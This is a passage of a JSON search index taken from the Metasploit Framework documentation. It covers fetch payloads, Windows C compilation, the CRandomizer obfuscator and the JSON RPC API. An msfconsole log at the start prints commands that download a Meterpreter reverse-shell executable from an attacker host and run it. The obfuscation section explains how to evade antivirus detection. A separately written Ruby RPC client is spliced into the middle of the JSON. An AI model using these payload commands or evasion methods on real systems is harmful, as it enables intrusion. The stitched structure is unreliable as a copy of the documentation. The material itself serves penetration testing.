msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; set LPORT 4445 LPORT =&amp;gt; 4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 &amp;amp; start /B plEYxIdBQna.exe [*] Payload Handler Started as Job 4 [*] starting tftpserver on 10.5.135.201:8080 [*] Started reverse TCP handler on 10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 4 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; netstat -an | grep 8080 [*] exec: netstat -an | grep 8080 udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_URIPATH test4 FETCH_URIPATH =&amp;gt; test4 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; set LPORT 8547 LPORT =&amp;gt; 8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 &amp;amp; start /B DOjmRoCOSMn.exe [*] Payload Handler Started as Job 5 [*] starting tftpserver on 10.5.135.201:8080 [*] Started reverse TCP handler on 10.5.135.201:8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) &amp;gt; netstat -an | grep 8080 [*] exec: netstat -an | grep 8080 udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 
0.0.0.0:* . Nothing stops you from starting multiple tftp servers with the same IP, port and FETCH_URIPATH value but serving different payloads. The result is a race condition in which the payload actually served is non-deterministic. Windows Only . Certutil . Certutil is a great choice for Windows targets: it is likely to be present on most recent releases of Windows and is highly configurable. The one troublesome aspect is that Certutil has no insecure mode, so if you use it with the HTTPS protocol the server certificate will be validated and must therefore be correct. It supports the HTTP and HTTPS protocols. Linux Only . FTP . FTP is an old but useful binary. While we support using the FTP binary, we do not have an FTP server. Modern releases of FTP support both the HTTP and HTTPS protocols. Unfortunately, we only support these modern versions of inline FTP, so it may not be appropriate for older systems. TNFTP . TNFTP (not to be confused with TFTP) is a newer version of FTP. It behaves exactly like modern FTP, but sometimes both the legacy FTP and TNFTP are present on a system, in which case the command is tnftp rather than ftp. WGET . WGET is likely the first choice for a Linux-only target. It supports both HTTPS and HTTP and all Fetch payload options. It is ubiquitous on Linux hosts and very standard, making it an excellent choice. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#supported-commands",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#supported-commands"
  },"353": {
    "doc": "How to use Fetch Payloads",
    "title": "How to use Fetch Payloads",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html"
  },"354": {
    "doc": "Overview",
    "title": "On this page",
    "content": ". | EXE Example | DLL Example | Printf() | Custom Headers | Code Randomization | . Metasploit::Framework::Compiler::Windows is a wrapper of Metasm specifically for compiling C code for the Windows platform. The purpose of the wrapper is to support default headers, such as stdio.h, String.h, Windows.h, or other important headers that you might use while writing in C. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#on-this-page"
  },"355": {
    "doc": "Overview",
    "title": "EXE example",
    "content": "c_template = %Q|#include &amp;lt;Windows.h&amp;gt; int main(void) { LPCTSTR lpMessage = \"Hello World\"; LPCTSTR lpTitle = \"Hi\"; MessageBox(NULL, lpMessage, lpTitle, MB_OK); return 0; }| require 'metasploit/framework/compiler/windows' ## Save as an exe variable exe = Metasploit::Framework::Compiler::Windows.compile_c(c_template) ## Save the binary as a file Metasploit::Framework::Compiler::Windows.compile_c_to_file('/tmp/test.exe', c_template) . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#exe-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#exe-example"
  },"356": {
    "doc": "Overview",
    "title": "DLL example",
    "content": "c_template = %Q|#include &amp;lt;Windows.h&amp;gt; BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, \"Hello World\", \"Hello\", MB_OK); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; } // This will be a function in the export table int Msg __attribute__((export))(void) { MessageBox(NULL, \"Hello World\", \"Hello\", MB_OK); return 0; } | require 'metasploit/framework/compiler/windows' dll = Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll) . To load the DLL, you can use the LoadLibrary API: . #include &amp;lt;Windows.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; int main(void) { HMODULE hMod = LoadLibrary(\"hello_world.dll\"); if (hMod) { printf(\"hello_world.dll loaded\\n\"); } else { printf(\"Unable to load hello_world.dll\\n\"); } return 0; } . Or call the exported function with rundll32: . rundll32 hello_world.dll,Msg . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#dll-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#dll-example"
  },"357": {
    "doc": "Overview",
    "title": "Printf()",
    "content": "Methods like printf() won’t actually print anything, because it’s not connected up to stdout. If you want to use printf() for debugging purposes, consider using OutputDebugString, or MessageBox. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#printf",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#printf"
  },"358": {
    "doc": "Overview",
    "title": "Custom Headers",
    "content": "Currently, the Metasm wrapper does not support custom headers from an arbitrary location. To work around this, you can place your headers in data/headers/windows, and then add that file name in lib/metasploit/framework/compiler/headers/windows.h. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#custom-headers",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#custom-headers"
  },"359": {
    "doc": "Overview",
    "title": "Code Randomization",
    "content": "Metasploit::Framework::Compiler supports obfuscation that randomizes the code at the source level and then compiles it. There are two methods we can use: . | Metasploit::Framework::Compiler::Windows.compile_random_c | Metasploit::Framework::Compiler::Windows.compile_random_c_to_file | . Metasploit::Framework::Compiler::Windows.compile_random_c_to_file example: . require 'msf/core' require 'metasploit/framework/compiler/windows' c_source_code = %Q| #include &amp;lt;Windows.h&amp;gt; int main() { const char* content = \"Hello World\"; const char* title = \"Hi\"; MessageBox(0, content, title, MB_OK); return 0; }| outfile = \"/tmp/helloworld.exe\" weight = 70 # This value is used to determine how random the code gets. Metasploit::Framework::Compiler::Windows.compile_random_c_to_file(outfile, c_source_code, weight: weight) . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#code-randomization",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html#code-randomization"
  },"360": {
    "doc": "Overview",
    "title": "Overview",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-use-metasploit-framework-compiler-windows-to-compile-c-code.html"
  },"361": {
    "doc": "C Obfuscation",
    "title": "How to use Metasploit::Framework::Obfuscation::CRandomizer",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#how-to-use-metasploitframeworkobfuscationcrandomizer",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#how-to-use-metasploitframeworkobfuscationcrandomizer"
  },"362": {
    "doc": "C Obfuscation",
    "title": "What is CRandomizer",
    "content": "CRandomizer is an obfuscation feature in Metasploit Framework that allows you to randomize C code. It is done by injecting random statements such as native API calls, custom fake function calls, or other routines, etc. The CRandomizer is also supported by Metasploit Framework’s code compiling API, which allows you to build a custom application that is unique (in terms of checksums), also harder to reverse-engineer. The randomness of the modification is based on a weight, an arbitrary number from 0 - 100. The higher the number, the more random the code gets. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#what-is-crandomizer",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#what-is-crandomizer"
  },"363": {
    "doc": "C Obfuscation",
    "title": "Components",
    "content": "CRandomizer relies on Metasm to be able to parse C code. The following components are built to parse and modify the source code. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#components",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#components"
  },"364": {
    "doc": "C Obfuscation",
    "title": "Code Factory",
    "content": "Also known as Metasploit::Framework::Obfuscation::CRandomizer::CodeFactory. The CodeFactory module is used to make the random stubs that will get injected later in the source code. Currently, the things this class is capable of making include small stubs like if statements, a switch, fake functions, and Windows API calls, etc. Each stub tends to be small, and considered as benign by most AVs. Every class in CodeFactory, except for Base, FakeFunction, and FakeFunctionCollection, is a stub candidate that gets randomly selected and used in the source code. If a stub requires a native API call, then the class can specify @dep to set that dependency. If the source code does not support the API call, then the next stub candidate is used (or until one is found). For example, the CRandomizer::CodeFactory::OutputDebugString class is used to generate a fake OutputDebugString call, and the dependency is set as ['OutputDebugString']. If the source code includes the Windows.h header, the CRandomizer knows it is okay to inject OutputDebugString. If not, CRandomizer will not use it. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-factory",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-factory"
  },"365": {
    "doc": "C Obfuscation",
    "title": "Modifier",
    "content": "Also known as Metasploit::Framework::Obfuscation::CRandomizer::Modifier. The Modifier class decides how something should be modified, and actually modifies the source code, for example: a function, different if statements, loops, nested blocks, etc. While the modifier walks through the source, it will randomly inject extra code (provided by the CodeFactory class) at each statement, until there are no more functions to modify. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#modifier",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#modifier"
  },"366": {
    "doc": "C Obfuscation",
    "title": "Parser",
    "content": "Also known as Metasploit::Framework::Obfuscation::CRandomizer::Parser. The main purpose of the Parser class is to convert the source code into a parsable format using Metasm, and then pass the functions to the Modifier class to process. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#parser",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#parser"
  },"367": {
    "doc": "C Obfuscation",
    "title": "Utility",
    "content": "The Utility class provides quick-to-use methods that any CRandomizer classes could use. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#utility",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#utility"
  },"368": {
    "doc": "C Obfuscation",
    "title": "Code Example",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#code-example"
  },"369": {
    "doc": "C Obfuscation",
    "title": "Creating a new stub",
    "content": "First, add a new file under the code_factory with an arbitrary file name. For example: hello.rb. In this example, let’s create a new stub that will printf() “Hello World”. Your stub should be written as a class under the CodeFactory namespace, and make sure to inherit the Base class. Like this: . require 'metasploit/framework/obfuscation/crandomizer/code_factory/base' module Metasploit module Framework module Obfuscation module CRandomizer module CodeFactory class Printf &amp;lt; Base def initialize super @dep = ['printf'] end def stub %Q| int printf(const char*); void stub() { printf(\"Hello World\"); }| end end end end end end end . Notice a couple of things: . | Every class should have its own stub method. And this stub method should return a string that contains the code you wish to inject. In addition, your code should be written as a function so that Metasm knows how to pick it up, hence the printf is in a void stub() function. | If your stub requires a native API (in this case, we are using printf), then you must add this function name in the @dep instance variable, which is an array. | Please keep in mind that your stub should remain simple and small, and not unique. For example, avoid: . | Allocate a huge chunk of memory | Avoid marking or allocating executable memory | Loops | Load referenced section, resource, or .data | Anti-debugging functions from the Windows API | Lots of function calls | Unique strings | APIs that access the Windows registry or the file system | XOR | Shellcode | Any other suspicious code patterns that are unique to malware. | . | . ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#creating-a-new-stub",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#creating-a-new-stub"
  },"370": {
    "doc": "C Obfuscation",
    "title": "Randomizing source code",
    "content": "Please refer to tools/exploit/random_compile_c.rb for example. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#randomizing-source-code",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html#randomizing-source-code"
  },"371": {
    "doc": "C Obfuscation",
    "title": "C Obfuscation",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-use-metasploit-framework-obfuscation-crandomizer.html"
  },"372": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "Starting the JSON API Server",
    "content": "The pre-requisite to running the JSON API Server is to run your Metasploit database. This can be initialized with msfdb. Note that msfdb will ask if you wish to run the JSON RPC web service - but it is not required for this guide which shows how to run the JSON service directly with thin or Puma: . First run the Metasploit database: . msfdb init . After configuring the database the JSON RPC service can be initialized with the thin Ruby web server: . bundle exec thin --rackup msf-json-rpc.ru --address 0.0.0.0 --port 8081 --environment production --tag msf-json-rpc start . Or with Puma: . bundle exec puma msf-json-rpc.ru --port 8081 --environment production --tag msf-json-rpc start . Development . If you are wanting to develop or debug the Ruby implementation of the JSON RPC service - it can be useful to run the Metasploit API synchronously in the foreground. This allows for console logs to appear directly in the terminal, as well as being able to interact with breakpoints via require 'pry-byebug'; binding.pry: . It is possible to debug Msfconsole’s webservice component too: . bundle exec ruby ./msfdb reinit bundle exec ruby ./msfdb --component webservice stop bundle exec ruby ./msfdb --component webservice --no-daemon start . RPC Logging . You can configure the RPC service logging with the MSF_WS_DATA_SERVICE_LOGGER environment variable. The list of supported loggers is viewable with msfconsole --help. The list at the time of writing is: . | Stdout / Stderr / StdoutWithoutTimestamps - Write logs to stdout/stderr | Flatfile / TimestampColorlessFlatfile - Write logs to ~/.msf4/logs | . Example usage: . 
$ MSF_WS_DATA_SERVICE_LOGGER=Stdout bundle exec thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment production --tag msf-json-rpc start [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [11/25/2020 17:34:54] [e(0)] core: Unable to load module /Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/gather/office365userenum.py - LoadError Try running file manually to check for errors or dependency issues. Thin web server (v1.7.2 codename Bachmanity) Maximum connections set to 1024 Listening on localhost:8081, CTRL+C to stop [11/25/2020 17:35:17] [d(0)] core: Already established connection to postgresql, so reusing active connection. [11/25/2020 17:35:17] [e(0)] core: DB.connect threw an exception - ActiveRecord::AdapterNotSpecified database configuration does not specify adapter [11/25/2020 17:35:17] [e(0)] core: Failed to connect to the database: database configuration does not specify adapter``` . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#starting-the-json-api-server",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#starting-the-json-api-server"
  },"373": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "Concepts",
    "content": "The Metasploit RPC aims to follow the jsonrpc specification. Therefore: . | Each JSON RPC request should provide a unique message ID which the client and server can use to correlate requests and responses | Metasploit may return the following error codes. | . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#concepts",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#concepts"
  },"374": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "Examples",
    "content": "First ensure you are running the Metasploit database, and are running the JSON service before running these examples . Querying . Query DB status . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.status\", \"id\": 1, \"params\": [] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"driver\": \"postgresql\", \"db\": \"msf\" }, \"id\": 1 } . Query workspaces . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.workspaces\", \"id\": 1, \"params\": [] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"workspaces\": [ { \"id\": 1, \"name\": \"default\", \"created_at\": 1673368954, \"updated_at\": 1673368954 } ] }, \"id\": 1 } . Modules workflow . Search for modules . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'content-type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.search\", \"id\": 1, \"params\": [\"psexec author:egypt arch:x64\"] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": [ { \"type\": \"exploit\", \"name\": \"PsExec via Current User Token\", \"fullname\": \"exploit/windows/local/current_user_psexec\", \"rank\": \"excellent\", \"disclosuredate\": \"1999-01-01\" } ], \"id\": 1 } . Run module check methods . Metasploit modules support running check methods which can be used to identify the success of an exploit module, or to run an auxiliary module against a target. For instance, with an Auxiliary module check request: . 
curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.check\", \"id\": 1, \"params\": [ \"auxiliary\", \"auxiliary/scanner/ssl/openssl_heartbleed\", { \"RHOST\": \"192.168.123.13\" } ] }' . Or an exploit module check request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'content-type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.check\", \"id\": 1, \"params\": [ \"exploit\", \"exploit/windows/smb/ms17_010_eternalblue\", { \"RHOST\": \"192.168.123.13\" } ] }' . The response will contain an identifier which can be used to query for updates: . { \"jsonrpc\": \"2.0\", \"result\": { \"job_id\": 0, \"uuid\": \"1MIqJ5lViZHSOuaWf1Zz1lpR\" }, \"id\": 1 } . Query all running stats . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.running_stats\", \"id\": 1, \"params\": [] }' . The response will include the following keys: . | waiting - modules that are queued up, but have not started to run yet | running - currently running modules | results - the module has completed or failed, and the results can be retrieved and acknowledged | . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"waiting\": [ \"NkJvf4kp4JxcuFCz7rjSuHL1\", \"wRnMQuJ8gzMTp5CaHu18bHdV\" ], \"running\": [ \"b7hIX6G4ZtwvRVRDOXk5ylSx\", \"gx9xTEi6KlH5LJHauyhrHTBn\" ], \"results\": [ \"1MIqJ5lViZHSOuaWf1Zz1lpR\", \"IN5PwYXrjqKfuekQt8cyCENK\", \"Spd1xfgsCZXQABNh7UA3uB58\", \"nRQw0bEvhFcXF0AxtVYOpQku\" ] }, \"id\": 1 } . Retrieve module results . It is possible to poll for module results using the uuid returned when running a module. Request: . 
curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.results\", \"id\": 1, \"params\": [\"0L37lfcIQqyRK9aBTIVJB4H3\"] }' . Example response while the module has not yet completed: . { \"jsonrpc\": \"2.0\", \"result\": { \"status\": \"running\" }, \"id\": 1 } . Example error response: . { \"jsonrpc\": \"2.0\", \"result\": { \"status\": \"errored\", \"error\": \"The connection with (192.168.123.13:443) timed out.\" }, \"id\": 1 } . Example success response: . { \"jsonrpc\": \"2.0\", \"result\": { \"status\": \"completed\", \"result\": { \"code\": \"vulnerable\", \"message\": \"The target is vulnerable.\", \"reason\": null, \"details\": { \"os\": \"Windows 7 Enterprise 7601 Service Pack 1\", \"arch\": \"x64\" } } }, \"id\": 1 } . Acknowledge module results . Acknowledging a result lets Metasploit drop it from memory. Unacknowledged results accumulate, but the store is an ActiveSupport::Cache::MemoryStore capped at 35 MB, so old entries are evicted rather than growing without bound; a client that never acks can therefore lose results it has not yet read. . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.ack\", \"id\": 1, \"params\": [\"nRQw0bEvhFcXF0AxtVYOpQku\"] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"success\": true }, \"id\": 1 } . Analyzing hosts workflow . Metasploit supports an analyze command which suggests modules to run based on what a user has already learned and stored about a host. First report a host: . 
curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.report_host\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\", \"state\": \"alive\", \"os_name\": \"Windows\", \"os_flavor\": \"Enterprise\", \"os_sp\": \"SP2\", \"os_lang\": \"English\", \"arch\": \"ARCH_X86\", \"mac\": \"97-42-51-F2-A7-A7\", \"scope\": \"eth2\", \"virtual_host\": \"VMWare\" } ] }' # response: {\"jsonrpc\":\"2.0\",\"result\":{\"result\":\"success\"},\"id\":1} . Report the host vulnerabilities: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.report_vuln\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\", \"name\": \"Exploit Name\", \"info\": \"Human readable description of the vuln\", \"refs\": [ \"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\", \"CVE-2017-0147\", \"CVE-2017-0148\" ] } ] }' # response: {\"jsonrpc\":\"2.0\",\"result\":{\"result\":\"success\"},\"id\":1} . Run the analyze command: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.analyze_host\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\" } ] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"host\": { \"address\": \"10.0.0.1\", \"modules\": [ { \"mtype\": \"exploit\", \"mname\": \"exploit/windows/smb/ms17_010_eternalblue\", \"state\": \"READY_FOR_TEST\", \"description\": \"ready for testing\", \"options\": { \"invalid\": [], \"missing\": [] } } ] } }, \"id\": 1 } . 
When analyzing a host, it is also possible to specify payload requirements for additional granularity: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.analyze_host\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\", \"payload\": \"payload/cmd/unix/reverse_bash\" } ] }' . ",
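The check / results / ack workflow above, as an added example in Ruby that is not part of the Metasploit documentation or code base: a small JSON-RPC 2.0 client that correlates every response with the id it sent, sends a bearer token only when one is supplied, and polls module.results until the run leaves the running state before acknowledging it. The endpoint path, method names and response shapes are taken from the requests on this page; the fake server used to exercise the client offline is constructed here (it answers running once, then completed). The same workflow applies to the MessagePack RPC guide, which differs only in wire encoding.

```ruby
require 'json'
require 'net/http'

class MsfJsonRpcClient
  DEFAULT_URL = 'http://localhost:8081/api/v1/json-rpc'.freeze

  # transport: a callable taking the JSON request body and returning the raw
  # response body, so the HTTP layer can be swapped for a fake when testing.
  def initialize(url: DEFAULT_URL, token: nil, transport: nil)
    @uri = URI(url)
    @token = token
    @transport = transport || method(:http_post)
    @next_id = 0
  end

  # Build the request envelope; every call gets a fresh id for correlation.
  def build_request(method, params)
    @next_id += 1
    { 'jsonrpc' => '2.0', 'method' => method, 'id' => @next_id, 'params' => params }
  end

  # Send one call and return its result. A response carrying an error, or an
  # id that does not match the request, is rejected rather than trusted.
  def call(method, params = [])
    request = build_request(method, params)
    response = JSON.parse(@transport.call(JSON.generate(request)))
    raise "JSON-RPC error: #{response['error'].inspect}" if response.key?('error')
    unless response['id'] == request['id']
      raise "id mismatch: sent #{request['id']}, got #{response['id']}"
    end
    response.fetch('result')
  end

  # Queue a check, poll module.results until it leaves the running state,
  # then ack so the server can drop the result from its in-memory store.
  def check_module(type, fullname, options, poll_interval: 1, max_polls: 60)
    uuid = call('module.check', [type, fullname, options]).fetch('uuid')
    max_polls.times do
      res = call('module.results', [uuid])
      if res['status'] == 'running'
        sleep(poll_interval)
        next
      end
      call('module.ack', [uuid])
      return res
    end
    raise "module #{fullname} (#{uuid}) still running after #{max_polls} polls"
  end

  private

  def http_post(body)
    req = Net::HTTP::Post.new(@uri)
    req['Content-Type'] = 'application/json'
    req['Authorization'] = "Bearer #{@token}" if @token
    req.body = body
    Net::HTTP.start(@uri.host, @uri.port, use_ssl: @uri.scheme == 'https') do |http|
      http.request(req).body
    end
  end
end

# Constructed fake server for offline use: replays the response shapes shown
# above (module.results answers running once, then completed) and records acks.
def fake_msf_server(acks)
  polls = 0
  lambda do |body|
    req = JSON.parse(body)
    envelope = { 'jsonrpc' => '2.0', 'id' => req['id'] }
    case req['method']
    when 'module.check'
      envelope['result'] = { 'job_id' => 0, 'uuid' => 'constructed-uuid' }
    when 'module.results'
      polls += 1
      envelope['result'] =
        if polls == 1
          { 'status' => 'running' }
        else
          { 'status' => 'completed',
            'result' => { 'code' => 'vulnerable', 'message' => 'The target is vulnerable.' } }
        end
    when 'module.ack'
      acks << req['params'].first
      envelope['result'] = { 'success' => true }
    else
      envelope['error'] = { 'code' => -32601, 'message' => 'Method not found' }
    end
    JSON.generate(envelope)
  end
end

if __FILE__ == $PROGRAM_NAME
  client = MsfJsonRpcClient.new(transport: fake_msf_server([]))
  p client.check_module('exploit', 'exploit/windows/smb/ms17_010_eternalblue',
                        { 'RHOST' => '192.168.123.13' }, poll_interval: 0)
end
```

Against a real service, drop the transport argument and pass url: and token: instead; the id check matters there because the same connection may be shared by several callers and a mismatched reply should never be attributed to the wrong request.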
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#examples",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#examples"
  },"375": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "How to use Metasploit JSON RPC",
    "content": "The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports. The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API. There are currently two implementations of Metasploit’s RPC: . | HTTP and messagepack - covered by a separate guide | HTTP and JSON - covered by this guide | . Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents. ",
